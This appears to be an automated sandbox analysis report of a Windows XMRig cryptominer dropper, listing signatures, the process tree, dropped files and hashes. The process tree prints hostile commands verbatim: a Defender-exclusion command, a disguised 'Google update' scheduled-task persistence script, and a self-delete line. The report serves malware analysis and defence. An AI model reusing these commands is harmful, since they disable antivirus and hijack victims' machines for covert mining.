Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1801s
  • max time network
    1793s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-01-2024 17:15

General

  • Target

    grhsghsGHswgh/Y2JYGshMHJGuGREA.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3528
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1992
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:952
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1216
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3820
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:1028
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5100
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:1472
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4380
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:2608
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:4760
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              PID:1892
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:4916
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:1904
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:3096
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4772

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe

            Filesize

            111KB

            MD5

            d8e25f13068db84d7d829c7ce46a5b27

            SHA1

            8aa1046b90744fecad290416cee2694c7bb0b7be

            SHA256

            0869376931f84fd95705fbced07597645ce1eb95fe0d1f4df117c5476b875ce2

            SHA512

            a2b02d7dd6abaef974c2dae822cb3f237045b65eecb95590ab041ca2b010f05fa36611d96a905738ab328b979922d4776fce911dfebaf0c6b173a6de3385aec8

          • C:\Program Files\Google\Chrome\updater.exe

            Filesize

            1.8MB

            MD5

            5dcfa1b1411130b2c0b71ae5dd5e12c7

            SHA1

            31d40656d1c4b98a09a1852cacd86c917509c2bd

            SHA256

            718ece0cd9c53e7fd5af2cf908dc6d1ccfdd4c47f6434790bdf8be2f43ccf336

            SHA512

            faad04c84b677d8ed8d79233c17f4bd00ee55933a05be3cbd1322d72a5c308344ebb270743e3af23afa112e5e53d2315b2e0bbf46587061b89d8a654d63b7aab

          • C:\Program Files\Google\Libs\g.log

            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B

            MD5

            d28a889fd956d5cb3accfbaf1143eb6f

            SHA1

            157ba54b365341f8ff06707d996b3635da8446f7

            SHA256

            21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

            SHA512

            0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            58f473558345c4d2feab48d4999b148a

            SHA1

            a58fec1ddadb3cb692cd1bac3d21d09592ec58ee

            SHA256

            69496654c76a65ba517bb7ee3bacb598a1e778aa7ee7807bf7318087d8d39d22

            SHA512

            f19f50701c05d050fa114e29544e77ce620c4f05619262781eb5a12906f3e4a0219d79ea574e2ace3bdad8c25346f2dad71e9768f64361321e9299061b7b87d0

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rk2ltujo.gux.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/952-11-0x00007FFC51B50000-0x00007FFC52611000-memory.dmp

            Filesize

            10.8MB

          • memory/952-16-0x00007FFC51B50000-0x00007FFC52611000-memory.dmp

            Filesize

            10.8MB

          • memory/952-13-0x000001BB41D90000-0x000001BB41DA0000-memory.dmp

            Filesize

            64KB

          • memory/952-12-0x000001BB41D90000-0x000001BB41DA0000-memory.dmp

            Filesize

            64KB

          • memory/952-1-0x000001BB5C400000-0x000001BB5C422000-memory.dmp

            Filesize

            136KB

          • memory/1216-18-0x00007FFC51B50000-0x00007FFC52611000-memory.dmp

            Filesize

            10.8MB

          • memory/1216-33-0x00007FFC51B50000-0x00007FFC52611000-memory.dmp

            Filesize

            10.8MB

          • memory/1216-31-0x0000028019E80000-0x0000028019E90000-memory.dmp

            Filesize

            64KB

          • memory/1216-20-0x0000028019E80000-0x0000028019E90000-memory.dmp

            Filesize

            64KB

          • memory/1216-19-0x0000028019E80000-0x0000028019E90000-memory.dmp

            Filesize

            64KB

          • memory/1992-35-0x00007FF7D4BD0000-0x00007FF7D4DE1000-memory.dmp

            Filesize

            2.1MB

          • memory/1992-0-0x00007FF7D4BD0000-0x00007FF7D4DE1000-memory.dmp

            Filesize

            2.1MB

          • memory/2608-116-0x00007FFC51B50000-0x00007FFC52611000-memory.dmp

            Filesize

            10.8MB

          • memory/2608-114-0x0000022877340000-0x0000022877350000-memory.dmp

            Filesize

            64KB

          • memory/2608-113-0x0000022877340000-0x0000022877350000-memory.dmp

            Filesize

            64KB

          • memory/2608-112-0x00007FF4A2C90000-0x00007FF4A2CA0000-memory.dmp

            Filesize

            64KB

          • memory/2608-101-0x0000022877340000-0x0000022877350000-memory.dmp

            Filesize

            64KB

          • memory/2608-95-0x0000022877340000-0x0000022877350000-memory.dmp

            Filesize

            64KB

          • memory/2608-94-0x0000022877340000-0x0000022877350000-memory.dmp

            Filesize

            64KB

          • memory/2608-93-0x00007FFC51B50000-0x00007FFC52611000-memory.dmp

            Filesize

            10.8MB

          • memory/3096-145-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-157-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-189-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-187-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-185-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-183-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-181-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-179-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-177-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-175-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-173-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-171-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-169-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-167-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-165-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-163-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-161-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-159-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-155-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-153-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-151-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-124-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-125-0x000001B0D3200000-0x000001B0D3220000-memory.dmp

            Filesize

            128KB

          • memory/3096-126-0x000001B0E3800000-0x000001B0E3840000-memory.dmp

            Filesize

            256KB

          • memory/3096-149-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-128-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-129-0x000001B0E3860000-0x000001B0E3880000-memory.dmp

            Filesize

            128KB

          • memory/3096-130-0x000001B0E3840000-0x000001B0E3860000-memory.dmp

            Filesize

            128KB

          • memory/3096-132-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-133-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-147-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-135-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-137-0x000001B0E3840000-0x000001B0E3860000-memory.dmp

            Filesize

            128KB

          • memory/3096-136-0x000001B0E3860000-0x000001B0E3880000-memory.dmp

            Filesize

            128KB

          • memory/3096-139-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-141-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/3096-143-0x00007FF70A8C0000-0x00007FF70B0B4000-memory.dmp

            Filesize

            8.0MB

          • memory/4380-76-0x000001EE54090000-0x000001EE5409A000-memory.dmp

            Filesize

            40KB

          • memory/4380-80-0x000001EE541F0000-0x000001EE541F8000-memory.dmp

            Filesize

            32KB

          • memory/4380-64-0x000001EE51BA0000-0x000001EE51BB0000-memory.dmp

            Filesize

            64KB

          • memory/4380-81-0x000001EE54220000-0x000001EE54226000-memory.dmp

            Filesize

            24KB

          • memory/4380-82-0x000001EE54230000-0x000001EE5423A000-memory.dmp

            Filesize

            40KB

          • memory/4380-83-0x000001EE51BA0000-0x000001EE51BB0000-memory.dmp

            Filesize

            64KB

          • memory/4380-79-0x000001EE54240000-0x000001EE5425A000-memory.dmp

            Filesize

            104KB

          • memory/4380-86-0x00007FFC51B50000-0x00007FFC52611000-memory.dmp

            Filesize

            10.8MB

          • memory/4380-78-0x000001EE541E0000-0x000001EE541EA000-memory.dmp

            Filesize

            40KB

          • memory/4380-63-0x000001EE51BA0000-0x000001EE51BB0000-memory.dmp

            Filesize

            64KB

          • memory/4380-77-0x000001EE54200000-0x000001EE5421C000-memory.dmp

            Filesize

            112KB

          • memory/4380-75-0x000001EE53FD0000-0x000001EE54085000-memory.dmp

            Filesize

            724KB

          • memory/4380-62-0x00007FFC51B50000-0x00007FFC52611000-memory.dmp

            Filesize

            10.8MB

          • memory/4380-74-0x000001EE53FB0000-0x000001EE53FCC000-memory.dmp

            Filesize

            112KB

          • memory/4772-52-0x00007FF698B10000-0x00007FF698D21000-memory.dmp

            Filesize

            2.1MB

          • memory/4772-123-0x00007FF698B10000-0x00007FF698D21000-memory.dmp

            Filesize

            2.1MB

          • memory/4772-105-0x00007FF698B10000-0x00007FF698D21000-memory.dmp

            Filesize

            2.1MB

          • memory/4916-134-0x00007FF7DAB10000-0x00007FF7DAB26000-memory.dmp

            Filesize

            88KB

          • memory/4916-127-0x00007FF7DAB10000-0x00007FF7DAB26000-memory.dmp

            Filesize

            88KB

          • memory/5100-46-0x00007FFC51B50000-0x00007FFC52611000-memory.dmp

            Filesize

            10.8MB

          • memory/5100-51-0x00007FFC51B50000-0x00007FFC52611000-memory.dmp

            Filesize

            10.8MB

          • memory/5100-47-0x00000217AFE90000-0x00000217AFEA0000-memory.dmp

            Filesize

            64KB

          • memory/5100-48-0x00000217AFE90000-0x00000217AFEA0000-memory.dmp

            Filesize

            64KB